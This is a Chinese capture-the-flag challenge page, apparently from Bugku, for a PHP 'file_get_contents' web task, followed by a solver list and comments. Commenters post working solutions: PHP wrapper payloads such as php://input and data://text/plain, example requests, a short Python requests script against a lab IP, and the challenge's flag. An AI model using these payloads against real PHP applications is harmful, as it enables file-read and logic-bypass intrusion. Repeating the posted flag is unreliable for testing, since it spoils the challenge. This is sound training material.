file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
3601
提 示:
描 述:
file_get_contents????
评分(5)
解题动态

DoubleUUU 攻破了该题 3小时前

ookjhh 攻破了该题 4小时前

pspp 攻破了该题 5小时前

unigui 攻破了该题 6小时前

ccttffwwyy 攻破了该题 1天前

kaiyafanfan123 攻破了该题 1天前

Bolzman 攻破了该题 1天前

050880 攻破了该题 1天前

daundian 攻破了该题 2天前

Makaba 攻破了该题 2天前

13252036872 攻破了该题 2天前

ptz123 攻破了该题 3天前

ct1640 攻破了该题 4天前

zypts 攻破了该题 4天前

19513396653 攻破了该题 4天前

lindaxu 攻破了该题 4天前

liu216 攻破了该题 4天前

hulihaha 攻破了该题 5天前

tracyfuli 攻破了该题 5天前

评论
liuguowang75 7天前
举报
/?ac=bugku&fn=flag.txt,想到flag文本了,没想到ac=bugku,哈哈
HK1ng 15天前
举报
file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。
goodsnack 15天前
举报
post ac=1&fn=php://input raw里填1,对应ac的值
Zhumeng 4月前
举报
看到file_get_getcontents就要想到伪协议
Melancholy 4月前
举报
使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1
飞天的母猪 5月前
举报
flag{688ebf9ece3756a3a5ac4e16616f1873}
xiazhi 6月前
举报
url/?ac=bugku&fn=flag.txt
bbggddaa 6月前
举报
https://blog.csdn.net/silence1_/article/details/90241302
LLTVLL 7月前
举报
?ac=123&fn=php://input,hackbar中post参数1
2324291123 10月前
举报
import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)